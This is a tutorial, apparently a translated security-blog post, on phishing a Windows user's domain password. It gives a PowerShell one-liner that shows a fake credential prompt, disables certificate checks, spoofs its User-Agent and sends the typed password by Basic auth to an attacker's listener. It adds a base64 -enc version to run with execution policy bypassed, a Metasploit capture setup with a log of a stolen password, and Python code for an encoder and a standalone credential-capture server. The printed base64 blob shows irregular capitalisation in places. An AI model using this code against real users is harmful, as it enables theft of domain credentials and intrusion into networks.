Basic authentication phishing with PowerShell: capturing a user's password

Source: Internet
Author: User
Tags: base64, ssl, certificate

This article is from https://www.secpulse.com/archives/4131.html

$cred = $host.ui.PromptForCredential('Failed Authentication', '', [Environment]::UserDomainName + "\" + [Environment]::UserName, [Environment]::UserDomainName); [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $wc = New-Object Net.WebClient; $wc.Headers.Add("User-Agent", "Wget/1.9+cvs-stable (Red Hat modified)"); $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.Credentials = New-Object System.Net.NetworkCredential($cred.UserName, $cred.GetNetworkCredential().Password, ''); $result = $wc.DownloadString('https://172.16.102.163');

Break it down:

$cred = $host.ui.PromptForCredential('Failed Authentication', '', [Environment]::UserDomainName + "\" + [Environment]::UserName, [Environment]::UserDomainName);

This asks Windows to show its standard credential prompt. The arguments of PromptForCredential are the caption, the message, the pre-filled user name and the target name: we set the caption to "Failed Authentication" and pre-fill the dialog with the current user's domain and user name so that it looks like a genuine re-authentication request. None of this is needed for the capture itself; it only makes the prompt more convincing. Note that the prompt does not verify the password against anything: whatever the user types is accepted and handed to the script.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells the .NET HTTP stack that PowerShell uses to accept any server certificate, so the self-signed certificate presented by the listener later does not make the request fail. In Windows PowerShell this callback is process-wide, so every HTTPS request made from that process afterwards is also unvalidated.

$wc = New-Object Net.WebClient; $wc.Headers.Add("User-Agent", "Wget/1.9+cvs-stable (Red Hat modified)");

Creates a WebClient object and sets its User-Agent header to a wget string, so the request does not stand out as PowerShell in web or proxy logs.

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells the WebClient to go through whatever proxy the current user is configured with, and to authenticate to that proxy with the user's cached network credentials. This is what lets the request leave a corporate network whose proxy requires authentication.

$wc.Credentials = New-Object System.Net.NetworkCredential($cred.UserName, $cred.GetNetworkCredential().Password, '');

This attaches the user name and password from the prompt as the credentials the WebClient will present when the server demands Basic authentication. GetNetworkCredential() turns the SecureString held by the prompt back into the plaintext password, and that plaintext password is what the attacker, or the penetration tester, is after: a valid domain password is a very useful foothold for moving further into the internal network.

$result = $wc.DownloadString('https://172.16.102.163');

Finally, send a request to the listening machine, where the Metasploit http_basic capture module is waiting. The module answers the first request with a 401 and a Basic authentication challenge; the WebClient then retries with an Authorization header carrying the user name and password, Base64-encoded, and the module logs them.

cat power.txt | iconv --to-code UTF-16LE | base64

Jabjahiazqbkacaapqagacqaaabvahmadaauahuaaqauahaacgbvag0acab0agyabwbyagmacgblagqazqbuahqaaqbhagwakaanaeyayqbpagwazqbkacaaqQb1ahqaaablag4adabpagmayqb0agkabwbuaccalaanaccalabbaeuabgb2agkacgbvag4abqblag4adabdadoaogbvahmazqbyaeqabwbtageaaqbuae4ayqBtaguaiaaracaaigbcaciaiaaracaawwbfag4adgbpahiabwbuag0azqbuahqaxqa6adoavqbzaguacgboageabqblacwawwbfag4adgbpahiabwbuag0azqbUahqaxqa6adoavqbzaguacgbeag8abqbhagkabgboageabqblackaowakafsauwb5ahmadablag0algboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0Ae0ayqbuageazwblahiaxqa6adoauwblahiadgblahiaqwblahiadabpagyaaqbjageadablafyayqbsagkazabhahqaaqbvag4aqwbhagwababiageaywbraCaapqagahsajab0ahiadqblah0aowakacqadwbjacaapqagag4azqb3ac0abwbiagoazqbjahqaiabuaguadaauahcazqbiagmababpaguabgb0adsacgakahCaywauaegazqbhagqazqbyahmalgbbagqazaaoaciavqbzaguacgataeeazwblag4adaaiacwaigbxagcazqb0ac8amqauadkakwbjahyacwatahmadabhagiabablacaakabsaguazaagaegayqb0acaabqbvagqaaqbmagkazqbkackaigapadsacgakahcaywauafaacgbvahgaeqagad0aiabbafmaeqbzahqazqbtac4aTgblahqalgbxaguaygbsaguacqb1aguaCwb0af0aoga6aeqazqbmageadqbsahqavwblagiauabyag8aeab5adsacgakahcaywauafaacgbvahgaeqauaemacgblagqazqbuahqaaqbhagwacwagad0aiAbbafmaeqbzahqazqbtac4atgblahqalgbdahiazqbkaguabgb0agkayqbsaemayqbjaggazqbdadoaogbeaguazgbhahuabab0ae4azqb0ahcabwbyagsaqwByaguazablag4adabpageababzadsacgakahcaywauagmacgblagqazqbuahqaaqbhagwacwagad0aiabuaguadwatag8aygbqaguaywb0acaacwb5ahmadabLag0algbuaguadaauag4azqb0ahcabwbyagsaywbyaguazablag4adabpageabaaoacqaywbyaguazaauahuacwblahiabgbhag0azqasacaajabjahiazqbkAc4azwblahqabgblahqadwbvahiaawbjahiazqbkaguabgb0agkayqbsacgakqauahaayqbzahmadwbvahiazaasacaajwanackaowakacqacgblahmadqbsaHqaiaa9acaajab3agmalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaanaggadab0ahaacwa6ac8alwaxadcamgauadeangauadeamaayac4amqa2adMajwapadsacga=

This is the Base64 encoding of the script above. The iconv step matters: PowerShell's -EncodedCommand expects the Base64 of the script in UTF-16LE, not UTF-8. If base64 wrapped its output onto several lines, join them into a single string (or use base64 -w 0) before passing it on the command line.

Then run powershell -ep bypass -enc <the encoded string above> (-ep bypass is -ExecutionPolicy Bypass, -enc is -EncodedCommand) and a very realistic Basic authentication phishing window appears:
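The encoding step in Python, as an added example that is not part of the original article (the article uses the iconv pipeline above). It builds the -enc argument from the one-liner, shows why the UTF-16LE conversion is required, and gives the inverse that a defender applies to an -enc blob pulled out of a process-creation log. The SCRIPT constant is the article's one-liner; the NUL-ratio check is an added triage heuristic, not something the article describes.

```python
import base64

# The article's one-liner, embedded here so the example runs offline.
SCRIPT = r"""$cred = $host.ui.PromptForCredential('Failed Authentication', '', [Environment]::UserDomainName + "\" + [Environment]::UserName, [Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = New-Object Net.WebClient;
$wc.Headers.Add("User-Agent", "Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.Credentials = New-Object System.Net.NetworkCredential($cred.UserName, $cred.GetNetworkCredential().Password, '');
$result = $wc.DownloadString('https://172.16.102.163');
"""


def encode_powershell_command(script: str) -> str:
    """Build the argument for `powershell -EncodedCommand` (`-enc`).

    PowerShell base64-decodes the argument and reads the bytes as UTF-16LE
    (.NET's "Unicode" encoding). That is what `iconv --to-code UTF-16LE`
    does in the article's pipeline; a Base64 blob of the UTF-8 text is not
    accepted.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Inverse operation: recover the script from an -enc argument, for
    example one copied out of a command-line audit log. Whitespace from
    wrapped base64 output is tolerated."""
    raw = base64.b64decode("".join(blob.split()), validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE (was the script encoded as UTF-8?)")
    return raw.decode("utf-16-le")


def utf16_null_ratio(blob: str) -> float:
    """Triage heuristic (added here, not from the article): fraction of
    odd-indexed bytes that are NUL. An ASCII-only script in UTF-16LE gives
    1.0; a UTF-8 encoding of the same text gives about 0.0."""
    raw = base64.b64decode("".join(blob.split()), validate=True)
    odd = raw[1::2]
    return sum(1 for b in odd if b == 0) / len(odd) if odd else 0.0


if __name__ == "__main__":
    blob = encode_powershell_command(SCRIPT)
    assert decode_powershell_command(blob) == SCRIPT
    print(f"powershell -ep bypass -enc {blob}")
```

Running the block prints the complete command line; the first characters of the blob match the start of the article's encoded string because both begin with the UTF-16LE bytes of "$cred = $host".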

On the other side, use Metasploit to receive the password:

~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "sittingduck\user:asdqwe123" => /
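What the http_basic module does on the wire, as an added example in Python that is not part of the original article or of Metasploit: a minimal capture server for the exchange described in the breakdown and shown in the msfconsole log. The first GET from the WebClient carries no credentials and is answered with 401 plus a WWW-Authenticate challenge (the module's "Sending 401 to client"); the retry carries Authorization: Basic with base64(user:password), which the server decodes and logs. The realm is the module's default "Secure Site"; the listening port 8080 and the optional PEM file argument for HTTPS are assumptions of this example.

```python
import base64
import ssl
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer

REALM = "Secure Site"   # http_basic's default REALM setting
collected = []          # (client_ip, user, password), like the module's "Credential collected"


def parse_basic_authorization(value):
    """Parse an 'Authorization: Basic <b64>' header into (user, password).

    Basic auth is base64(user + ':' + password): an encoding, not
    encryption, which is why the captured password is readable as-is.
    Returns None for a missing, non-Basic or malformed header.
    """
    if not value:
        return None
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return None
    # Only the first ':' separates the fields; a password may itself contain ':'.
    user, sep, password = raw.decode("latin-1").partition(":")
    return (user, password) if sep else None


def basic_authorization(user, password):
    """The header the victim's WebClient sends once it has been challenged."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1")).decode("ascii")
    return "Basic " + token


def handle_get(authorization, realm=REALM):
    """Server-side decision for one GET, kept free of sockets so it can be tested.
    Returns (status, extra_headers, credentials_or_None).

    .NET's WebClient does not send its Credentials pre-emptively: the first
    request has no Authorization header and must be answered with 401 and a
    challenge; only the retry carries the user name and password.
    """
    creds = parse_basic_authorization(authorization)
    if creds is None:
        return 401, {"WWW-Authenticate": f'Basic realm="{realm}"'}, None
    return 200, {}, creds


class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, creds = handle_get(self.headers.get("Authorization"))
        if creds is not None:
            collected.append((self.client_address[0],) + creds)
            print(f'[+] {self.client_address[0]} - Credential collected: "{creds[0]}:{creds[1]}"')
        self.send_response(status)
        for name, val in headers.items():
            self.send_header(name, val)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):   # silence per-request logging
        pass


if __name__ == "__main__":
    # Assumed: plain HTTP on 8080. Pass a PEM file (certificate plus key) as
    # the first argument to serve HTTPS like the article's listener does; a
    # self-signed certificate is enough because the one-liner disables validation.
    server = HTTPServer(("0.0.0.0", 8080), CaptureHandler)
    if len(sys.argv) > 1:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(sys.argv[1])
        server.socket = ctx.wrap_socket(server.socket, server_side=True)
    print("[*] Listening on 0.0.0.0:8080 ...")
    server.serve_forever()
```

To test it against the article's one-liner, point DownloadString at this host and port instead of https://172.16.102.163 (and drop the https scheme unless a PEM file was given); the server prints the captured domain\user and password in the same form as the msfconsole log.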
